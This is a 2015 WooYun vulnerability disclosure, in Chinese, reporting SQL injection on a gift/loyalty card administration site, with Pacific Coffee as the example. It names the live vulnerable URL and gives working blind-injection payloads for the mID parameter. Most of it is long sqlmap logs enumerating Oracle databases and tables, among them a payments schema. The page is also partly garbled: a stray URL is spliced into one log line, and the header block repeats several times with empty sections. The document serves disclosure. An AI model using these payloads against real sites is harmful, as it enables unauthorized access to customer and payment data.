某全球礼物/会员卡网站某站点存在注入漏洞（以太平洋咖啡为例）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144521

漏洞标题：某全球礼物/会员卡网站某站点存在注入漏洞（以太平洋咖啡为例）

漏洞作者： yonghao

提交时间：2015-10-03 13:16

修复时间：2015-11-17 13:18

公开时间：2015-11-17 13:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-03：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-11-17：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

通过改变命令参数可以对其进行更深入的攻击。

详细说明：

https://www.cardadministration.com/login.jsp?mID=PCC 存在注入漏洞
https://www.cardadministration.com/login.jsp?mID=PCC%27%20AND%204950=4950%20AND%20%27EWau%27=%27EWau

Parameter: mID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mID=PCC' AND 4950=4950 AND 'EWau'='EWau
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: mID=PCC' AND 1434=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(68)||CHR(67)||CHR(90),5) AND 'oNsE'='oNsE

时间关系只扫描部分库

Database: MDSYS
[36 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS          |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES                 |
| SDO_COORD_AXIS_NAMES           |
| SDO_COORD_OPS                  |
| SDO_COORD_OP_METHODS           |
| SDO_COORD_OP_PARAMS            |
| SDO_COORD_OP_PARAM_USE         |
| SDO_COORD_OP_PARAM_VALS        |
| SDO_COORD_OP_PATHS             |
| SDO_COORD_REF_SYS              |
| SDO_COORD_SYS                  |
| SDO_CS_SRS                     |
| SDO_DATUMS                     |
| SDO_DATUMS_OLD_SNAPSHOT        |
| SDO_ELLIPSOIDS                 |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT    |
| SDO_GEOR_PLUGIN_REGISTRY       |
| SDO_GEOR_XMLSCHEMA_TABLE       |
| SDO_GR_MOSAIC_0                |
| SDO_GR_MOSAIC_1                |
| SDO_GR_MOSAIC_2                |
| SDO_GR_MOSAIC_3                |
| SDO_GR_RDT_1                   |
| SDO_PREFERRED_OPS_SYSTEM       |
| SDO_PREFERRED_OPS_USER         |
| SDO_PRIME_MERIDIANS            |
| SDO_PROJECTIONS_OLD_SNAPSHOT   |
| SDO_TOPO_DATA$                 |
| SDO_TOPO_RELATION_DATA         |
| SDO_TOPO_TRANSACT_DATA         |
| SDO_TXN_IDX_DELETES            |
| SDO_TXN_IDX_EXP_UPD_RGN        |
| SDO_TXN_IDX_INSERTS            |
| SDO_UNITS_OF_MEASURE           |
| SDO_XML_SCHEMAS                |
+--------------------------------+

Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mID=PCC' AND 4814=4814 AND 'XZzZ'='XZzZ
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: mID=PCC' AND 1434=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(68)||CHR(67)||CHR(90),5) AND 'oNsE'='oNsE

和部分表

CTXSYS
[11:16:16] [INFO] retrieved: EXFSYS
[11:17:10] [INFO] retrieved: MDSYS
[11:18:02] [INFO] retrieved: OLAPSYhttp://202.77.166.191/eng/index.php?id=1S
[11:19:12] [INFO] retrieved: PAYWARE
[11:20:18] [INFO] retrieved: SYS
[11:20:57] [INFO] retrieved: SYSTEM
[11:22:05] [INFO] retrieved: WMSYS
[11:22:59] [INFO] fetching tables for databases: 'CTXSYS, EXFSYS, MDSYS, OLAPSYS, PAYWARE, SYS, SYSTEM, WMSYS'
[11:22:59] [INFO] fetching number of tables for database 'SYS'
[11:22:59] [INFO] retrieved: 
31
[11:23:15] [INFO] retrieved: 
DUAL
[11:24:00] [INFO] retrieved: SYSTEM_PRIVILEGE
[11:27:08] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
_MAP
[11:27:40] [INFO] retrieved: 
TABLE_PRIVILEGE_MAP
[11:32:07] [INFO] retrieved: 
STMT_AUDIT_OPT
[11:35:36] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ION_MAP
[11:37:59] [INFO] retrieved: AUDIT_ACTIONS
[11:41:51] [INFO] retrieved: AW$AWMD
[11:43:47] [INFO] retrieved: AW$AWCREATE
[11:45:22] [INFO] retrieved: OLAPI_SESSION_HISTORY
[11:49:27] [INFO] retrieved: OLAPI_IFACE_OBJECT_HISTORY
[11:53:14] [INFO] retrieved: OLAP_OLEDB_KEYWORDS
[11:55:25] [INFO] retrieved: OLAP_OLEDB_MDPROPVALS
[11:57:50] [INFO] retrieved: OLAP_OLEDB_MDPROPS
[11:58:25] [INFO] retrieved: OLAP_OLEDB_FUNCTIONS_PVT
[12:01:51] [INFO] retrieved: OLAPI_HISTORY
[12:03:30] [INFO] retrieved: OLAPI_MEMORY_HEAP_HISTORY
[12:07:25] [INFO] retrieved: AW$AWXML
[12:09:00] [INFO] retrieved: OLAPI_IFACE_OP_HISTORY
[12:12:31] [INFO] retrieved: OLAPI_MEMOR
[12:13:55] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
Y_OP_
[12:15:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
HISTORY
[12:16:21] [INFO] retrieved: 
AW$EXPRESS
[12:17:51] [INFO] retrieved: AW$AWCREATE10G
[12:19:30] [INFO] retrieved: AW$AWREPORT
[12:20:41] [INFO] retrieved: SDO_GEOR_XMLSCHEMA_
[12:25:08] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
TABLE
[12:25:47] [INFO] retrieved: ODCI_SECOBJ$
[12:27:39] [INFO] retrieved: ODCI_WARNINGS$
[12:29:43] [INFO] retrieved: OLAPTABLEVELTUPLES
[12:32:32] [INFO] retrieved: OLAPTABLEVELS
[12:33:03] [INFO] retrieved: PSTUBTBL
[12:34:25] [INFO] retrieved: KU$NOEXP_TAB
[12:36:12] [INFO] retrieved: PLAN_TABLE$
[12:38:58] [INFO] retrieved: IMPDP_STATS
[12:40:51] [INFO] retrieved: WRI$_ADV_ASA_RECO_DATA
[12:43:59] [INFO] fetching number of tables for database 'OLAPSYS'
[12:43:59] [INFO] retrieved: 9
[12:44:07] [INFO] retrieved: XML_LOAD_RECORDS
[12:47:54] [INFO] retrieved: XML_LOAD_LOG
[12:49:03] [INFO] retrieved: OLAP_SESSION_CUBES
[12:52:08] [INFO] retrieved: OLAP_SESSION_
[12:53:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
DIMS
[12:54:21] [INFO] retrieved: CWM2$AWCUBECREATEACCESS
[12:57:59] [INFO] retrieved: CWM2$AWDIMCREATEACCESS
[13:00:43] [INFO] retrieved: CWM2$_TEMP_VALUES
[13:02:14] [INFO] retrieved: CWM2$_AW_TEMP_CUST_MEAS_MAP
[13:04:25] [INFO] retrieved: CWM2$_AW_NEXT_TEMP
[13:06:13] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
_CUST_MEA
[13:07:36] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
S
[13:07:49] [INFO] fetching number of tables for database 'SYSTEM'
[13:07:49] [INFO] resumed: 8
[13:07:49] [INFO] resumed: DEF$_TEMP$LOB
[13:07:49] [INFO] resumed: HELP
[13:07:49] [INFO] resumed: MVIEW$_ADV_INDEX
[13:07:49] [INFO] resumed: MVIEW$_ADV_PARTITION
[13:07:49] [INFO] resumed: MVIEW$_ADV_OWB
[13:07:49] [INFO] resumed: OL$NODES
[13:07:49] [INFO] resumed: OL$HINTS
[13:07:49] [INFO] resumed: OL$
[13:07:49] [INFO] fetching number of tables for database 'EXFSYS'
[13:07:49] [INFO] retrieved: 1
[13:08:00] [INFO] retrieved: RLM$PARSEDCOND
[13:10:20] [INFO] fetching number of tables for database 'MDSYS'
[13:10:20] [INFO] retrieved: 36
[13:10:35] [INFO] retrieved: OGIS_SPATIAL_REFERENCE_SYSTEMS
[13:13:51] [INFO] retrieved: OGIS_GEOMETRY_COLUMNS
[13:15:39] [INFO] retrieved: SDO_UNITS_OF_
[13:17:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
MEASURE
[13:18:20] [INFO] retrieved: SDO_P
[13:19:05] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
RIME_MERIDIANS
[13:21:19] [INFO] retrieved: SDO_ELLIPSOIDS
[13:22:18] [INFO] retrieved: SDO_DATUMS
[13:22:59] [INFO] retrieved: SDO_COORD_SYS
[13:24:09] [INFO] retrieved: SDO_COORD_AXIS_NAMES
[13:25:33] [INFO] retrieved: SDO_COORD_AXES
[13:26:00] [INFO] retrieved: SDO_COORD_REF_SYS
[13:26:56] [INFO] retrieved: SDO_COORD_OP_METHODS
[13:28:28] [INFO] retrieved: SDO_COORD_OPS
[13:30:07] [INFO] retrieved: SDO_PREFERRED_OPS_SYSTEM
[13:32:52] [INFO] retrieved: SDO_PREFERRED_OPS_USER
[13:33:44] [INFO] retrieved: SDO_COORD_OP_PATHS
[13:35:13] [INFO] retrieved: SDO_COORD_OP_PARAMS
[13:35:53] [INFO] retrieved: SDO_COORD_OP_PARAM_USE
[13:36:41] [INFO] retrieved: SDO_COORD_OP_PARAM_VALS
[13:37:22] [INFO] retrieved: SDO_XML_SCHEMAS
[13:38:59] [INFO] retrieved: SDO_CS_SRS
[13:39:52] [INFO] retrieved: SDO_PROJECTIONS_OLD_SNAPSHOT
[13:43:02] [INFO] retrieved: SDO_ELLIPSOIDS_OLD_SNAPSHOT
[13:45:46] [INFO] retrieved: SDO_DATUMS_OLD_SNAPSHOT
[13:47:51] [INFO] retrieved: SDO_GEOR_XMLSCHEMA_TABLE
[13:50:41] [INFO] retrieved: SDO_GEOR_PLUGIN_REGISTRY
[13:52:38] [INFO] retrieved: SDO_TXN_IDX_EXP_UPD_RGN
[13:54:56] [INFO] retrieved: SDO_TXN_IDX_DELETES
[13:56:30] [INFO] retrieved: SDO_TXN_IDX_INSERTS
[13:57:42] [INFO] retrieved: SDO_GR_RDT_1
[13:59:00] [INFO] retrieved: SDO_GR_MOSAIC_3
[14:00:20] [INFO] retrieved: SDO_GR_MOSAIC_2
[14:00:53] [INFO] retrieved: SDO_GR_MOSAIC_1
[14:01:33] [INFO] retrieved: SDO_GR_MOSAIC_0
[14:02:21] [INFO] retrieved: SDO_TOPO_DATA$
[14:03:48] [INFO] retrieved: SDO_TOPO_RELATION_DATA
[14:06:11] [INFO] retrieved: SDO_TOPO_TRANSACT_DATA
[14:08:25] [INFO] fetching number of tables for database 'PAYWARE'
[14:08:25] [INFO] retrieved: 683
[14:08:47] [INFO] retrieved: VA_LOYALTY_DAILY_TXN_20141113
[14:13:45] [INFO] retrieved: VA_SPEND_INCENTIVE_D
[14:16:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ET
[14:17:03] [INFO] retrieved: VA_ESPN_ITP_EXCEPTION

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144521

漏洞标题：某全球礼物/会员卡网站某站点存在注入漏洞（以太平洋咖啡为例）

相关厂商：某全球礼物卡网站

漏洞作者： yonghao

提交时间：2015-10-03 13:16

修复时间：2015-11-17 13:18

公开时间：2015-11-17 13:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 yonghao@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144521

漏洞标题：某全球礼物/会员卡网站某站点存在注入漏洞（以太平洋咖啡为例）

相关厂商：某全球礼物卡网站

漏洞作者： yonghao

提交时间：2015-10-03 13:16

修复时间：2015-11-17 13:18

公开时间：2015-11-17 13:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144521"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 yonghao@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：